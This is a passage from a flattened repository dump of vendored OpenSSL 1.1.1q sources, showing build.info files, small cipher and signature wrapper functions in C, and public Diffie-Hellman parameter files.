IMPLEMENT_ASN1_FUNCTIONS(X509_VAL) 21 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/async/arch/async_null.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | /* This must be the first #include file */ 11 | #include "../async_local.h" 12 | 13 | #ifdef ASYNC_NULL 14 | int ASYNC_is_capable(void) 15 | { 16 | return 0; 17 | } 18 | 19 | void async_local_cleanup(void) 20 | { 21 | } 22 | #endif 23 | 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/async/arch/async_null.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | /* 13 | * If we haven't managed to detect any other async architecture then we default 14 | * to NULL. 15 | */ 16 | #ifndef ASYNC_ARCH 17 | # define ASYNC_NULL 18 | # define ASYNC_ARCH 19 | 20 | typedef struct async_fibre_st { 21 | int dummy; 22 | } async_fibre; 23 | 24 | 25 | # define async_fibre_swapcontext(o,n,r) 0 26 | # define async_fibre_makecontext(c) 0 27 | # define async_fibre_free(f) 28 | # define async_fibre_init_dispatcher(f) 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/async/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | async.c async_wait.c async_err.c arch/async_posix.c arch/async_win.c \ 4 | arch/async_null.c 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/bf/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=bf_skey.c bf_ecb.c bf_cfb64.c bf_ofb64.c \ 3 | {- $target{bf_asm_src} -} 4 | 5 | GENERATE[bf-586.s]=asm/bf-586.pl \ 6 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) $(PROCESSOR) 7 | DEPEND[bf-586.s]=../perlasm/x86asm.pl ../perlasm/cbc.pl 8 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/bio/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | bio_lib.c bio_cb.c bio_err.c \ 4 | bss_mem.c bss_null.c bss_fd.c \ 5 | bss_file.c bss_sock.c bss_conn.c \ 6 | bf_null.c bf_buff.c b_print.c b_dump.c b_addr.c \ 7 | b_sock.c b_sock2.c bss_acpt.c bf_nbio.c bss_log.c bss_bio.c \ 8 | bss_dgram.c bio_meth.c bf_lbuf.c 9 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/blake2/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | blake2b.c blake2s.c m_blake2b.c m_blake2s.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/buffer/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=buffer.c buf_err.c 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/camellia/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | cmll_ecb.c cmll_ofb.c cmll_cfb.c cmll_ctr.c \ 4 | {- $target{cmll_asm_src} -} 5 | 6 | GENERATE[cmll-x86.s]=asm/cmll-x86.pl \ 7 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) \ 8 | $(PROCESSOR) 9 | DEPEND[cmll-x86.s]=../perlasm/x86asm.pl 10 | GENERATE[cmll-x86_64.s]=asm/cmll-x86_64.pl $(PERLASM_SCHEME) 11 | GENERATE[cmllt4-sparcv9.S]=asm/cmllt4-sparcv9.pl $(PERLASM_SCHEME) 12 | INCLUDE[cmllt4-sparcv9.o]=.. 13 | DEPEND[cmllt4-sparcv9.S]=../perlasm/sparcv9_modes.pl 14 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/camellia/cmll_cbc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2006-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | void Camellia_cbc_encrypt(const unsigned char *in, unsigned char *out, 14 | size_t len, const CAMELLIA_KEY *key, 15 | unsigned char *ivec, const int enc) 16 | { 17 | 18 | if (enc) 19 | CRYPTO_cbc128_encrypt(in, out, len, key, ivec, 20 | (block128_f) Camellia_encrypt); 21 | else 22 | CRYPTO_cbc128_decrypt(in, out, len, key, ivec, 23 | (block128_f) Camellia_decrypt); 24 | } 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/camellia/cmll_ctr.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2006-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | void Camellia_ctr128_encrypt(const unsigned char *in, unsigned char *out, 14 | size_t length, const CAMELLIA_KEY *key, 15 | unsigned char ivec[CAMELLIA_BLOCK_SIZE], 16 | unsigned char ecount_buf[CAMELLIA_BLOCK_SIZE], 17 | unsigned int *num) 18 | { 19 | 20 | CRYPTO_ctr128_encrypt(in, out, length, key, ivec, ecount_buf, num, 21 | (block128_f) Camellia_encrypt); 22 | } 23 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/camellia/cmll_ecb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2006-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "cmll_local.h" 12 | 13 | void Camellia_ecb_encrypt(const unsigned char *in, unsigned char *out, 14 | const CAMELLIA_KEY *key, const int enc) 15 | { 16 | if (CAMELLIA_ENCRYPT == enc) 17 | Camellia_encrypt(in, out, key); 18 | else 19 | Camellia_decrypt(in, out, key); 20 | } 21 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/camellia/cmll_ofb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2006-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | /* 14 | * The input and output encrypted as though 128bit ofb mode is being used. 15 | * The extra state information to record how much of the 128bit block we have 16 | * used is contained in *num; 17 | */ 18 | void Camellia_ofb128_encrypt(const unsigned char *in, unsigned char *out, 19 | size_t length, const CAMELLIA_KEY *key, 20 | unsigned char *ivec, int *num) 21 | { 22 | CRYPTO_ofb128_encrypt(in, out, length, key, ivec, num, 23 | (block128_f) Camellia_encrypt); 24 | } 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/cast/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | c_skey.c c_ecb.c {- $target{cast_asm_src} -} c_cfb64.c c_ofb64.c 4 | 5 | GENERATE[cast-586.s]=asm/cast-586.pl \ 6 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) $(PROCESSOR) 7 | DEPEND[cast-586.s]=../perlasm/x86asm.pl ../perlasm/cbc.pl 8 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/cast/c_ecb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "cast_local.h" 12 | #include 13 | 14 | void CAST_ecb_encrypt(const unsigned char *in, unsigned char *out, 15 | const CAST_KEY *ks, int enc) 16 | { 17 | CAST_LONG l, d[2]; 18 | 19 | n2l(in, l); 20 | d[0] = l; 21 | n2l(in, l); 22 | d[1] = l; 23 | if (enc) 24 | CAST_encrypt(d, ks); 25 | else 26 | CAST_decrypt(d, ks); 27 | l = d[0]; 28 | l2n(l, out); 29 | l = d[1]; 30 | l2n(l, out); 31 | l = d[0] = d[1] = 0; 32 | } 33 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/chacha/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]={- $target{chacha_asm_src} -} 3 | 4 | GENERATE[chacha-x86.s]=asm/chacha-x86.pl \ 5 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) $(PROCESSOR) 6 | GENERATE[chacha-x86_64.s]=asm/chacha-x86_64.pl $(PERLASM_SCHEME) 7 | GENERATE[chacha-ppc.s]=asm/chacha-ppc.pl $(PERLASM_SCHEME) 8 | GENERATE[chacha-armv4.S]=asm/chacha-armv4.pl $(PERLASM_SCHEME) 9 | INCLUDE[chacha-armv4.o]=.. 10 | GENERATE[chacha-armv8.S]=asm/chacha-armv8.pl $(PERLASM_SCHEME) 11 | INCLUDE[chacha-armv8.o]=.. 12 | GENERATE[chacha-s390x.S]=asm/chacha-s390x.pl $(PERLASM_SCHEME) 13 | INCLUDE[chacha-s390x.o]=.. 14 | 15 | BEGINRAW[Makefile(unix)] 16 | ##### CHACHA assembler implementations 17 | 18 | {- $builddir -}/chacha-%.S: {- $sourcedir -}/asm/chacha-%.pl 19 | CC="$(CC)" $(PERL) $< $(PERLASM_SCHEME) $@ 20 | ENDRAW[Makefile(unix)] 21 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/cmac/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=cmac.c cm_ameth.c cm_pmeth.c 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/cms/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]= \ 3 | cms_lib.c cms_asn1.c cms_att.c cms_io.c cms_smime.c cms_err.c \ 4 | cms_sd.c cms_dd.c cms_cd.c cms_env.c cms_enc.c cms_ess.c \ 5 | cms_pwri.c cms_kari.c 6 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/comp/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]= \ 3 | comp_lib.c comp_err.c \ 4 | c_zlib.c 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/conf/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]= \ 3 | conf_err.c conf_lib.c conf_api.c conf_def.c conf_mod.c \ 4 | conf_mall.c conf_sap.c conf_ssl.c 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/conf/conf_local.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | void conf_add_ssl_module(void); 11 | 12 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/conf/conf_mall.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2002-2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | #include "internal/cryptlib.h" 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include "conf_local.h" 18 | 19 | /* Load all OpenSSL builtin modules */ 20 | 21 | void OPENSSL_load_builtin_modules(void) 22 | { 23 | /* Add builtin modules here */ 24 | ASN1_add_oid_module(); 25 | ASN1_add_stable_module(); 26 | #ifndef OPENSSL_NO_ENGINE 27 | ENGINE_add_conf_module(); 28 | #endif 29 | EVP_add_alg_module(); 30 | conf_add_ssl_module(); 31 | } 32 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/ct/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]= ct_b64.c ct_err.c ct_log.c ct_oct.c ct_policy.c \ 3 | ct_prn.c ct_sct.c ct_sct_ctx.c ct_vfy.c ct_x509v3.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/des/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | set_key.c ecb_enc.c cbc_enc.c \ 4 | ecb3_enc.c cfb64enc.c cfb64ede.c cfb_enc.c \ 5 | ofb64ede.c ofb64enc.c ofb_enc.c \ 6 | str2key.c pcbc_enc.c qud_cksm.c rand_key.c \ 7 | {- $target{des_asm_src} -} \ 8 | fcrypt.c xcbc_enc.c cbc_cksm.c 9 | 10 | GENERATE[des_enc-sparc.S]=asm/des_enc.m4 11 | GENERATE[dest4-sparcv9.S]=asm/dest4-sparcv9.pl $(PERLASM_SCHEME) 12 | INCLUDE[dest4-sparcv9.o]=.. 13 | 14 | GENERATE[des-586.s]=asm/des-586.pl \ 15 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) 16 | DEPEND[des-586.s]=../perlasm/x86asm.pl ../perlasm/cbc.pl 17 | GENERATE[crypt586.s]=asm/crypt586.pl \ 18 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) 19 | DEPEND[crypt586.s]=../perlasm/x86asm.pl ../perlasm/cbc.pl 20 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/des/cbc_enc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #define CBC_ENC_C__DONT_UPDATE_IV 11 | 12 | #include "ncbc_enc.c" /* des_cbc_encrypt */ 13 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/des/rand_key.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1998-2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | int DES_random_key(DES_cblock *ret) 14 | { 15 | do { 16 | if (RAND_priv_bytes((unsigned char *)ret, sizeof(DES_cblock)) != 1) 17 | return 0; 18 | } while (DES_is_weak_key(ret)); 19 | DES_set_odd_parity(ret); 20 | return 1; 21 | } 22 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dh/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | dh_asn1.c dh_gen.c dh_key.c dh_lib.c dh_check.c dh_err.c dh_depr.c \ 4 | dh_ameth.c dh_pmeth.c dh_prn.c dh_rfc5114.c dh_kdf.c dh_meth.c \ 5 | dh_rfc7919.c 6 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dh/dh1024.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIGHAoGBAJf2QmHKtQXdKCjhPx1ottPb0PMTBH9A6FbaWMsTuKG/K3g6TG1Z1fkq 3 | /Gz/PWk/eLI9TzFgqVAuPvr3q14a1aZeVUMTgo2oO5/y2UHe6VaJ+trqCTat3xlx 4 | /mNbIK9HA2RgPC3gWfVLZQrY+gz3ASHHR5nXWHEyvpuZm7m3h+irAgEC 5 | -----END DH PARAMETERS----- 6 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dh/dh192.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MB4CGQDUoLoCULb9LsYm5+/WN992xxbiLQlEuIsCAQM= 3 | -----END DH PARAMETERS----- 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dh/dh2048.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIIBCAKCAQEA7ZKJNYJFVcs7+6J2WmkEYb8h86tT0s0h2v94GRFS8Q7B4lW9aG9o 3 | AFO5Imov5Jo0H2XMWTKKvbHbSe3fpxJmw/0hBHAY8H/W91hRGXKCeyKpNBgdL8sh 4 | z22SrkO2qCnHJ6PLAMXy5fsKpFmFor2tRfCzrfnggTXu2YOzzK7q62bmqVdmufEo 5 | pT8igNcLpvZxk5uBDvhakObMym9mX3rAEBoe8PwttggMYiiw7NuJKO4MqD1llGkW 6 | aVM8U2ATsCun1IKHrRxynkE1/MJ86VHeYYX8GZt2YA8z+GuzylIOKcMH6JAWzMwA 7 | Gbatw6QwizOhr9iMjZ0B26TE3X8LvW84wwIBAg== 8 | -----END DH PARAMETERS----- 9 | -----BEGIN DH PARAMETERS----- 10 | MIIBCAKCAQEArtA3w73zP6Lu3EOQtwogiXt3AXXpuS6yD4BhzNS1pZFyPHk0/an5 11 | 8ydEkPhQZHKDW+BZJxxPLANaTudWo2YT8TgtvUdN6KSgMiEi6McwqDw+SADuvW+F 12 | SKUYFxG6VFIxyEP6xBdf+vhJxEDbRG2EYsHDRRtJ76gp9cSKTHusf2R+4AAVGqnt 13 | gRAbNqtcOar/7FSj+Pl8G3v0Bty0LcCSpbqgYlnv6z+rErQmmC6PPvSz97TDMCok 14 | yKpCE9hFA1zkqK3TH4FmFvGeIaXJUIBZf4mArWuBTjWFW3nmhESRUn1VK3K3x42N 15 | a5k6c2+EhrMFiLjxuH6JZoqL0/E93FF9SwIBAg== 16 | -----END DH PARAMETERS----- 17 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dh/dh4096.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIICCAKCAgEA/urRnb6vkPYc/KEGXWnbCIOaKitq7ySIq9dTH7s+Ri59zs77zty7 3 | vfVlSe6VFTBWgYjD2XKUFmtqq6CqXMhVX5ElUDoYDpAyTH85xqNFLzFC7nKrff/H 4 | TFKNttp22cZE9V0IPpzedPfnQkE7aUdmF9JnDyv21Z/818O93u1B4r0szdnmEvEF 5 | bKuIxEHX+bp0ZR7RqE1AeifXGJX3d6tsd2PMAObxwwsv55RGkn50vHO4QxtTARr1 6 | rRUV5j3B3oPMgC7Offxx+98Xn45B1/G0Prp11anDsR1PGwtaCYipqsvMwQUSJtyE 7 | EOQWk+yFkeMe4vWv367eEi0Sd/wnC+TSXBE3pYvpYerJ8n1MceI5GQTdarJ77OW9 8 | bGTHmxRsLSCM1jpLdPja5jjb4siAa6EHc4qN9c/iFKS3PQPJEnX7pXKBRs5f7AF3 9 | W3RIGt+G9IVNZfXaS7Z/iCpgzgvKCs0VeqN38QsJGtC1aIkwOeyjPNy2G6jJ4yqH 10 | ovXYt/0mc00vCWeSNS1wren0pR2EiLxX0ypjjgsU1mk/Z3b/+zVf7fZSIB+nDLjb 11 | NPtUlJCVGnAeBK1J1nG3TQicqowOXoM6ISkdaXj5GPJdXHab2+S7cqhKGv5qC7rR 12 | jT6sx7RUr0CNTxzLI7muV2/a4tGmj0PSdXQdsZ7tw7gbXlaWT1+MM2MCAQI= 13 | -----END DH PARAMETERS----- 14 | 15 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dh/dh512.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MEYCQQDaWDwW2YUiidDkr3VvTMqS3UvlM7gE+w/tlO+cikQD7VdGUNNpmdsp13Yn 3 | a6LT1BLiGPTdHghM9tgAPnxHdOgzAgEC 4 | -----END DH PARAMETERS----- 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dh/dh_prn.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "internal/cryptlib.h" 12 | #include 13 | #include 14 | 15 | #ifndef OPENSSL_NO_STDIO 16 | int DHparams_print_fp(FILE *fp, const DH *x) 17 | { 18 | BIO *b; 19 | int ret; 20 | 21 | if ((b = BIO_new(BIO_s_file())) == NULL) { 22 | DHerr(DH_F_DHPARAMS_PRINT_FP, ERR_R_BUF_LIB); 23 | return 0; 24 | } 25 | BIO_set_fp(b, fp, BIO_NOCLOSE); 26 | ret = DHparams_print(b, x); 27 | BIO_free(b); 28 | return ret; 29 | } 30 | #endif 31 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dsa/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | dsa_gen.c dsa_key.c dsa_lib.c dsa_asn1.c dsa_vrf.c dsa_sign.c \ 4 | dsa_err.c dsa_ossl.c dsa_depr.c dsa_ameth.c dsa_pmeth.c dsa_prn.c \ 5 | dsa_meth.c 6 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dsa/dsa_sign.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include "internal/cryptlib.h" 11 | #include "dsa_local.h" 12 | #include 13 | 14 | DSA_SIG *DSA_do_sign(const unsigned char *dgst, int dlen, DSA *dsa) 15 | { 16 | return dsa->meth->dsa_do_sign(dgst, dlen, dsa); 17 | } 18 | 19 | #if OPENSSL_API_COMPAT < 0x10200000L 20 | int DSA_sign_setup(DSA *dsa, BN_CTX *ctx_in, BIGNUM **kinvp, BIGNUM **rp) 21 | { 22 | return dsa->meth->dsa_sign_setup(dsa, ctx_in, kinvp, rp); 23 | } 24 | #endif 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dsa/dsa_vrf.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include "internal/cryptlib.h" 11 | #include "dsa_local.h" 12 | 13 | int DSA_do_verify(const unsigned char *dgst, int dgst_len, DSA_SIG *sig, 14 | DSA *dsa) 15 | { 16 | return dsa->meth->dsa_do_verify(dgst, dgst_len, sig, dsa); 17 | } 18 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dso/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | dso_dl.c dso_dlfcn.c dso_err.c dso_lib.c \ 4 | dso_openssl.c dso_win32.c dso_vms.c 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/dso/dso_openssl.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2000-2019 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include "dso_local.h" 11 | 12 | #ifdef DSO_NONE 13 | 14 | static DSO_METHOD dso_meth_null = { 15 | "NULL shared library method" 16 | }; 17 | 18 | DSO_METHOD *DSO_METHOD_openssl(void) 19 | { 20 | return &dso_meth_null; 21 | } 22 | #endif 23 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/ec/curve448/arch_32/arch_intrinsics.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2017-2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * Copyright 2016 Cryptography Research, Inc. 4 | * 5 | * Licensed under the OpenSSL license (the "License"). You may not use 6 | * this file except in compliance with the License. You can obtain a copy 7 | * in the file LICENSE in the source distribution or at 8 | * https://www.openssl.org/source/license.html 9 | * 10 | * Originally written by Mike Hamburg 11 | */ 12 | 13 | #ifndef OSSL_CRYPTO_EC_CURVE448_ARCH_32_INTRINSICS_H 14 | # define OSSL_CRYPTO_EC_CURVE448_ARCH_32_INTRINSICS_H 15 | 16 | #include "internal/constant_time.h" 17 | 18 | # define ARCH_WORD_BITS 32 19 | 20 | #define word_is_zero(a) constant_time_is_zero_32(a) 21 | 22 | static ossl_inline uint64_t widemul(uint32_t a, uint32_t b) 23 | { 24 | return ((uint64_t)a) * b; 25 | } 26 | 27 | #endif /* OSSL_CRYPTO_EC_CURVE448_ARCH_32_INTRINSICS_H */ 28 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/engine/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | eng_err.c eng_lib.c eng_list.c eng_init.c eng_ctrl.c \ 4 | eng_table.c eng_pkey.c eng_fat.c eng_all.c \ 5 | tb_rsa.c tb_dsa.c tb_dh.c tb_rand.c \ 6 | tb_cipher.c tb_digest.c tb_pkmeth.c tb_asnmth.c tb_eckey.c \ 7 | eng_openssl.c eng_cnf.c eng_dyn.c \ 8 | eng_rdrand.c 9 | IF[{- !$disabled{devcryptoeng} -}] 10 | SOURCE[../../libcrypto]=eng_devcrypto.c 11 | ENDIF 12 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/engine/eng_all.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2001-2022 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include "internal/cryptlib.h" 11 | #include "eng_local.h" 12 | 13 | void ENGINE_load_builtin_engines(void) 14 | { 15 | OPENSSL_init_crypto(OPENSSL_INIT_ENGINE_ALL_BUILTIN, NULL); 16 | } 17 | 18 | #if (defined(__OpenBSD__) || defined(__FreeBSD__) || defined(__DragonFly__)) && OPENSSL_API_COMPAT < 0x10100000L 19 | void ENGINE_setup_bsd_cryptodev(void) 20 | { 21 | } 22 | #endif 23 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/err/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | err.c err_all.c err_prn.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/getenv.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the 